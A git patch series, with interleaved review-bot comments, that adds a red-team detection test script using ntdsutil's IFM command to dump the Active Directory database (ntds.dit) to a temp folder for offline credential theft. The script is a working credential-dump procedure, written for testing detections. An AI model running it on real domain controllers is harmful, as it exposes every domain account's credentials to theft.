From 4daa7c3112819cb5e1511fb7e3f606582c803404 Mon Sep 17 00:00:00 2001
From: Tony M Lambert
Date: Thu, 10 Jan 2019 16:10:56 -0600
Subject: [PATCH 1/4] T1003 - Added ntdsutil test to dump AD database

---
 red_ttp/ntdsutil_dump_ad.py | 26 ++++++++++++++++++++++++++
 1 file changed, 26 insertions(+)
 create mode 100644 red_ttp/ntdsutil_dump_ad.py

diff --git a/red_ttp/ntdsutil_dump_ad.py b/red_ttp/ntdsutil_dump_ad.py
new file mode 100644
index 0000000..b774ddb
--- /dev/null
+++ b/red_ttp/ntdsutil_dump_ad.py
@@ -0,0 +1,26 @@
+# Name: Dump Active Directory Database with NTDSUTIL
+# rta: ntdsutil_dump_ad.py
+# ATT&CK: T1003
+# Description: Dumps the Active Directory database, ntds.dit, to disk for offline credential access attacks.
+
+import os
+import common
+
+NTDSUTIL = "ntdsutil.exe"
+ACTIVATE = "\"activate instance ntds\""
+IFM = "\"IFM\""
+CREATE = "\“create full"
+DUMPDIR = "C:\Windows\Temp\RTA"
+
+
+def main():
+    common.log("Executing ntdsutil.exe...")
+    success = common.execute([NTDSUTIL, ACTIVATE, IFM, CREATE, DUMPDIR + "\"", "q", "q"])
+    if success:
+        common.log("Successfully executed ntdsutil.exe! NTDS.dit at " + DUMPDIR + "\Active Directory\NTDS.dit.")
+    else:
+        common.log("Did not successfully execute ntdsutil.exe.")
+
+
+if __name__ == "__main__":
+    exit(main())
\ No newline at end of file

From 440cfc96cf803fa1d7cff86ca24f6d0af35b551b Mon Sep 17 00:00:00 2001
From: Tony M Lambert
Date: Thu, 10 Jan 2019 16:30:11 -0600
Subject: [PATCH 2/4] Added functionality to create dump folder

---
 red_ttp/ntdsutil_dump_ad.py | 27 ++++++++++++++++++++++++---
 1 file changed, 24 insertions(+), 3 deletions(-)

diff --git a/red_ttp/ntdsutil_dump_ad.py b/red_ttp/ntdsutil_dump_ad.py
index b774ddb..f4efd78 100644
--- a/red_ttp/ntdsutil_dump_ad.py
+++ b/red_ttp/ntdsutil_dump_ad.py
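Review bot: The `"\Active Directory\NTDS.dit."` suffix in main()'s success message, and `DUMPDIR = "C:\Windows\Temp\RTA"`, only work because Python keeps unrecognised backslash escapes literally; `\N` is the start of the `\N{name}` escape in Python 3 string literals, so the file fails to compile there with a unicodeescape SyntaxError, and `\W`/`\T`/`\R`/`\A` are invalid-escape warnings on recent interpreters. Use raw strings, `DUMPDIR = r"C:\Windows\Temp\RTA"`, and build the output path with `os.path.join(DUMPDIR, "Active Directory", "NTDS.dit")` instead of a quoted suffix. Presumably the RTA harness runs on Python 2, where this happens to work; if so, a comment saying so would save the next person a surprise. The header should also state the prerequisite the command string implies: `# Requires: run with administrative rights on a Domain Controller (activates the NTDS instance via ntdsutil)`.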
@@ -5,21 +5,42 @@
 
 import os
 import common
+import errno
 
 NTDSUTIL = "ntdsutil.exe"
 ACTIVATE = "\"activate instance ntds\""
 IFM = "\"IFM\""
 CREATE = "\“create full"
-DUMPDIR = "C:\Windows\Temp\RTA"
+DUMPDIR = "C:\Windows\Temp\RTA"
+NTDSDIT_FILE = DUMPDIR + "\Active Directory\NTDS.dit"
 
 
 def main():
+
+    common.log("Ensuring dump folder exists...")
+    if os.path.exists(DUMPDIR):
+        common.log("Dump folder already exists, moving on!")
+    else
+        common.log("Dump folder doesn't exist, creating...")
+        try:
+            os.makedirs(directory)
+        except OSError as e:
+            if e.errno != errno.EEXIST:
+                common.log("Failed to create dump folder!")
+                raise
+
+
     common.log("Executing ntdsutil.exe...")
-    success = common.execute([NTDSUTIL, ACTIVATE, IFM, CREATE, DUMPDIR + "\"", "q", "q"])
-    if success:
+    code, output = common.execute([NTDSUTIL, ACTIVATE, IFM, CREATE, DUMPDIR + "\"", "q", "q"])
+
+    if code == 0:
         common.log("Successfully executed ntdsutil.exe! NTDS.dit at " + DUMPDIR + "\Active Directory\NTDS.dit.")
     else:
         common.log("Did not successfully execute ntdsutil.exe.")
+    if os.path.exists(NTDSDIT_FILE):
+        common.log("Successfully dumped Active Directory to " + NTDSDIT_FILE)
+    else:
+        common.log("Did not successfully create NTDS.dit file.")
 
 
 if __name__ == "__main__":

From c102f30d0a50575dede7fc47116e828be697144c Mon Sep 17 00:00:00 2001
From: ForensicITGuy
Date: Thu, 10 Jan 2019 17:04:48 -0600
Subject: [PATCH 3/4] Fixing things after testing

---
 red_ttp/ntdsutil_dump_ad.py | 12 ++++++------
 1 file changed, 6 insertions(+), 6 deletions(-)

diff --git a/red_ttp/ntdsutil_dump_ad.py b/red_ttp/ntdsutil_dump_ad.py
index f4efd78..2906acc 100644
--- a/red_ttp/ntdsutil_dump_ad.py
+++ b/red_ttp/ntdsutil_dump_ad.py
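Review bot: After the `os.path.exists(NTDSDIT_FILE)` check main() simply returns and leaves the dumped database sitting in `C:\Windows\Temp\RTA`; an IFM export is a complete offline credential set (ntds.dit plus, as far as I recall, the SYSTEM hive in a `registry` subfolder), so the test should delete it once the detection artifact has been produced, e.g. `shutil.rmtree(DUMPDIR, ignore_errors=True)` with `import shutil` added at the top, or the header must at least say that manual cleanup is required. The new `NTDSDIT_FILE = DUMPDIR + "\Active Directory\NTDS.dit"` repeats the `\A`/`\N` escape problem of the existing success message; `os.path.join(DUMPDIR, "Active Directory", "NTDS.dit")` avoids it entirely. `output` from `common.execute` is captured and then discarded — logging it on the failure branch would preserve ntdsutil's own error text.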
@@ -8,10 +8,10 @@
 import errno
 
 NTDSUTIL = "ntdsutil.exe"
-ACTIVATE = "\"activate instance ntds\""
-IFM = "\"IFM\""
-CREATE = "\“create full"
+ACTIVATE = "activate instance ntds"
+IFM = "IFM"
 DUMPDIR = "C:\Windows\Temp\RTA"
+CREATE = "create full " + DUMPDIR
 NTDSDIT_FILE = DUMPDIR + "\Active Directory\NTDS.dit"
 
 
@@ -20,10 +20,10 @@ def main():
     common.log("Ensuring dump folder exists...")
     if os.path.exists(DUMPDIR):
         common.log("Dump folder already exists, moving on!")
-    else
+    else:
         common.log("Dump folder doesn't exist, creating...")
         try:
-            os.makedirs(directory)
+            os.makedirs(DUMPDIR)
         except OSError as e:
             if e.errno != errno.EEXIST:
                 common.log("Failed to create dump folder!")
@@ -31,7 +31,7 @@ def main():
 
 
     common.log("Executing ntdsutil.exe...")
-    code, output = common.execute([NTDSUTIL, ACTIVATE, IFM, CREATE, DUMPDIR + "\"", "q", "q"])
+    code, output = common.execute([NTDSUTIL, ACTIVATE, IFM, CREATE, "q", "q"])
 
     if code == 0:
         common.log("Successfully executed ntdsutil.exe! NTDS.dit at " + DUMPDIR + "\Active Directory\NTDS.dit.")

From 7c7f2861df49854cb8888965ff8830cc6c6facb8 Mon Sep 17 00:00:00 2001
From: ForensicITGuy
Date: Thu, 10 Jan 2019 17:07:50 -0600
Subject: [PATCH 4/4] Forgot to remove redundant message.

---
 red_ttp/ntdsutil_dump_ad.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/red_ttp/ntdsutil_dump_ad.py b/red_ttp/ntdsutil_dump_ad.py
index 2906acc..9a3099b 100644
--- a/red_ttp/ntdsutil_dump_ad.py
+++ b/red_ttp/ntdsutil_dump_ad.py
@@ -34,7 +34,7 @@ def main():
     code, output = common.execute([NTDSUTIL, ACTIVATE, IFM, CREATE, "q", "q"])
 
     if code == 0:
-        common.log("Successfully executed ntdsutil.exe! NTDS.dit at " + DUMPDIR + "\Active Directory\NTDS.dit.")
+        common.log("Successfully executed ntdsutil.exe!")
     else:
         common.log("Did not successfully execute ntdsutil.exe.")
     if os.path.exists(NTDSDIT_FILE):
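Review bot: `CREATE = "create full " + DUMPDIR` passes the target path unquoted inside the single IFM subcommand string; that is fine for the space-free `C:\Windows\Temp\RTA`, but anyone who later repoints DUMPDIR at a path containing a space will have ntdsutil split the command at that space. Building it as `CREATE = 'create full "%s"' % DUMPDIR` keeps the path intact (ntdsutil's acceptance of an embedded quoted path should be confirmed on a test DC). `DUMPDIR` should also become a raw string, `r"C:\Windows\Temp\RTA"`, since `\T` and `\R` survive only because they are not valid escapes.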
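Review bot: With the `else:` fixed, the `os.path.exists(DUMPDIR)` guard and the `errno.EEXIST` handler in the new code now protect against the same condition twice, and the check-then-create pair still leaves a small race. Keeping only `try: os.makedirs(DUMPDIR)` / `except OSError as e: if e.errno != errno.EEXIST: raise` (with the failure log in that branch) is shorter and equivalent; if the harness is Python 3.2+, `os.makedirs(DUMPDIR, exist_ok=True)` replaces the whole block. main() starts before and continues after this hunk.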
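Review bot: `code, output = common.execute([NTDSUTIL, ACTIVATE, IFM, CREATE, "q", "q"])` still decides success on `code == 0` and discards `output`; ntdsutil executes the subcommands inside its own session and I would not rely on its process exit status reflecting an IFM failure (not verified here), whereas the error text in `output` is exactly what the log needs when no NTDS.dit appears. Log it on the failure path, `common.log(output)`, and treat the `os.path.exists(NTDSDIT_FILE)` check that follows as the authoritative verdict rather than the exit code. main() continues beyond this hunk.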